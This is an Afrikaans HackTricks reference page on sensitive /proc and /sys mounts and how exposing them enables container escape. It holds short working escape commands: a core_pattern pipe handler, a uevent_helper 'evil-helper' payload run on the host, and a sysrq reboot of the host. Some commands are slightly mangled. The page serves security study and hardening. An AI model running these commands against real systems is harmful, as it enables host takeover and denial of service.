Sensitive Mounts

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Die blootstelling van /proc en /sys sonder behoorlike naamsruimte-isolasie stel beduidende sekuriteitsrisiko's bloot, insluitend aanvalsoppervlakvergroting en inligtingsoffergawe. Hierdie gids bevat sensitiewe lêers wat, indien verkeerd geconfigureer of deur 'n ongemagtigde gebruiker benader, kan lei tot kontainerontsnapping, gasverandering of inligting voorsien wat verdere aanvalle kan ondersteun. Byvoorbeeld, die verkeerd monter van -v /proc:/host/proc kan AppArmor-beskerming omseil as gevolg van sy padgebaseerde aard, wat /host/proc onbeskerm agterlaat.

Jy kan verdere besonderhede van elke potensiële kwesbaarheid vind in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.

procfs Kwesbaarhede

/proc/sys

Hierdie gids maak toegang moontlik om kernelveranderlikes te wysig, gewoonlik via sysctl(2), en bevat verskeie subgidse van belang:

/proc/sys/kernel/core_pattern

  • Beskryf in core(5).

  • Maak dit moontlik om 'n program te definieer om uit te voer wanneer 'n kernlêer gegenereer word met die eerste 128 byte as argumente. Dit kan lei tot kode-uitvoering as die lêer begin met 'n pyp |.

  • Toets- en Uitbuitingvoorbeeld:

[ -w /proc/sys/kernel/core_pattern ] && echo Yes # Toets skryftoegang
cd /proc/sys/kernel
echo "|$overlay/shell.sh" > core_pattern # Stel aangepaste hanterer in
sleep 5 && ./crash & # Trigger hanterer

/proc/sys/kernel/modprobe

  • Uiteengesit in proc(5).

  • Bevat die pad na die kernelmodule-laaiers, aangeroep vir die laai van kernelmodules.

  • Toegangkontrole-voorbeeld:

ls -l $(cat /proc/sys/kernel/modprobe) # Kontroleer toegang tot modprobe

/proc/sys/vm/panic_on_oom

  • Verwys in proc(5).

  • 'n Globale vlag wat beheer of die kernel paniekerig word of die OOM-killer aanroep wanneer 'n OOM-toestand voorkom.

/proc/sys/fs

  • Volgens proc(5), bevat opsies en inligting oor die lêersisteem.

  • Skryftoegang kan verskeie ontkenning-van-diens-aanvalle teen die gas moontlik maak.

/proc/sys/fs/binfmt_misc

  • Maak dit moontlik om tolke vir nie-inheemse binêre formate te registreer op grond van hul toorgetal.

  • Kan lei tot bevoorregte eskalasie of toegang tot die root-skoot as /proc/sys/fs/binfmt_misc/register skryfbaar is.

  • Relevant uitbuit en verduideliking:

  • Diepgaande handleiding: Video-skakel

Ander in /proc

/proc/config.gz

  • Kan die kernelkonfigurasie onthul as CONFIG_IKCONFIG_PROC geaktiveer is.

  • Nuttig vir aanvallers om kwesbaarhede in die lopende kernel te identifiseer.

/proc/sysrq-trigger

  • Maak dit moontlik om Sysrq-opdragte aan te roep, wat moontlik onmiddellike stelselherlaaie of ander kritieke aksies kan veroorsaak.

  • Stelselherlaaivoorbeeld:

echo b > /proc/sysrq-trigger # Herlaai die gas

/proc/kmsg

  • Stel kernelringbufferboodskappe bloot.

  • Kan help met kernel-uitbuitings, adreslekke, en die voorsiening van sensitiewe stelselinligting.

/proc/kallsyms

  • Lys kernel-uitgevoerde simbole en hul adresse.

  • Essensieel vir kernel-uitbuitontwikkeling, veral vir die oorkom van KASLR.

  • Adresinligting is beperk met kptr_restrict ingestel op 1 of 2.

  • Besonderhede in proc(5).

/proc/[pid]/mem

  • Koppel met die kernelgeheue-toestel /dev/mem.

  • Histories vatbaar vir bevoorregte eskalasie-aanvalle.

  • Meer oor proc(5).

/proc/kcore

  • Verteenwoordig die stelsel se fisiese geheue in ELF-kernformaat.

  • Lees kan gasstelsel- en ander kontainergeheue-inhoud uitlek.

  • 'n Groot lêergrootte kan lei tot leesprobleme of sagtewarestortings.

  • Gedetailleerde gebruik in Dumping /proc/kcore in 2019.

/proc/kmem

  • Alternatiewe koppelvlak vir /dev/kmem, wat die kernel virtuele geheue verteenwoordig.

  • Maak lees en skryf moontlik, dus direkte wysiging van kernelgeheue.

/proc/mem

  • Alternatiewe koppelvlak vir /dev/mem, wat fisiese geheue verteenwoordig.

  • Maak lees en skryf moontlik, wysiging van alle geheue vereis die oplossing van virtuele na fisiese adresse.

/proc/sched_debug

  • Gee prosesbeplanningsinligting terug, wat PID-naamsruimtebeskerming omseil.

  • Stel prosesname, ID's, en cgroup-identifiseerders bloot.

/proc/[pid]/mountinfo

  • Verskaf inligting oor koppelplekke in die proses se koppelnaamruimte.

  • Stel die ligging van die kontainer rootfs of beeld bloot.

/sys Kwesbaarhede

/sys/kernel/uevent_helper

  • Gebruik vir die hanteer van kerneltoestel uevents.

  • Skryf na /sys/kernel/uevent_helper kan arbitrêre skripte uitvoer tydens uevent-triggering.

  • Voorbeeld vir Uitbuiting: %%%bash

Skep 'n lading

echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper

Vind gaspad vanaf OverlayFS-koppelpunt vir kontainer

host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)

Stel uevent_helper in op skadelike helper

echo "$host_path/evil-helper" > /sys/kernel/uevent_helper

Trigger 'n uevent

echo change > /sys/class/mem/null/uevent

Lees die uitset

cat /output %%%

/sys/class/thermal

  • Beheer temperatuurinstellings, moontlik veroorsaak DoS aanvalle of fisiese skade.

/sys/kernel/vmcoreinfo

  • Lek kernel adresse, moontlik kompromitteer KASLR.

/sys/kernel/security

  • Bevat securityfs koppelvlak, wat konfigurasie van Linux Security Modules soos AppArmor moontlik maak.

  • Toegang kan 'n houer in staat stel om sy MAC-stelsel uit te skakel.

/sys/firmware/efi/vars en /sys/firmware/efi/efivars

  • Blootstelling van koppelvlakke vir interaksie met EFI veranderlikes in NVRAM.

  • Verkeerde konfigurasie of uitbuiting kan lei tot gebreekte draagbare rekenaars of onopstartbare gasheer-masjiene.

/sys/kernel/debug

  • debugfs bied 'n "geen reëls" foutopsporingskoppelvlak na die kernel.

  • Geskiedenis van sekuriteitskwessies as gevolg van sy onbeperkte aard.

Verwysings

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated